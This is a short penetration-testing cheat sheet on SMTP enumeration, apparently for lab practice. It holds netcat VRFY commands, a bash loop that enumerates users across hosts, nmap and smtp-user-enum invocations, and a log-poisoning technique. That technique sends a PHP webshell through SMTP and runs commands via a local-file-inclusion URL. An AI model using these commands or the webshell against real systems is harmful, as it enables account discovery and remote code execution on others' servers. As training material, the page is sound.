SMTP Enum

CheckList

  • Check for version

  • LFI chaining log file poisoning

  • User enumeration

Grab the banner and VRFY

nc -nv 10.11.12.8 25 
VRFY bob 
250 2.1.5 
bob@redhat.active.com                  <--- Output if user exists
 
VRFY idontexist 
550 5.1.1 idontexist... User unknow    <--- Output if user does not exist

EXPN request: asks the server for the membership of a mailing list

Bash Script for SMTP 

#!/bin/bash

# VRFY Script
#############

for ips in $(cat numbers.txt);			# numbers.txt list of IP's
do
	for user in $(cat users.txt);       # users.txt list of usernames
	do 
		echo VRFY $user | nc -nv -w 1 10.11.1.$ips 25 2>/dev/null |grep ^"250"
	done
done

SMTP nmap scripts

nmap --script smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 10.0.0.1

SMTP user enum

smtp-user-enum -M VRFY -D domain.here -u username -t 10.10.10.10
smtp-user-enum -M VRFY -U usernamelist.txt -t 10.10.10.10

Code Execution through SMTP/LFI

telnet 10.10.10.10 25
EHLO sub.somedomain.com
VRFY username@localhost
mail from:someself@nodomain.io
rcpt to: username@localhost
data
Subject: Some Subject
<?php echo system($_REQUEST['cmd']); ?>

.

=================================================
After this and on the LFI you have discovered just place the variable cmd:
?cmd=id
&cmd=id 

Examples:
http://10.10.10.10/somedir/lfi.php?file=../../../../../var/log/mail.log&cmd=id
http://10.10.10.10/somedir/lfi.php?file=../../../../../var/log/mail.log&cmd=whoami
PreviousSMB EnumNextPOP3

Last updated

Was this helpful?